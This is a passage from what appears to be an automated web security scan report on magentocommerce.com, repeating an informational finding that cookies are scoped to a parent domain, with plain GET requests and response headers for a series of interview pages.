Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.60. http://www.magentocommerce.com/media/interviews/alpedia/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.61. http://www.magentocommerce.com/media/interviews/bright-light-media/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.62. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.63. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.64. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.65. http://www.magentocommerce.com/media/interviews/lodger-footwear/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.66. http://www.magentocommerce.com/media/interviews/man-junk/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.67. http://www.magentocommerce.com/media/interviews/nerdyshirts/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.68. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.69. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.70. http://www.magentocommerce.com/media/interviews/shoebacca/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.71. http://www.magentocommerce.com/media/interviews/signing-time/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.72. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.73. http://www.magentocommerce.com/media/interviews/timeout-online/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/timeout-online/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.74. http://www.magentocommerce.com/media/interviews/tvonics/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.75. http://www.magentocommerce.com/media/interviews/wander/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

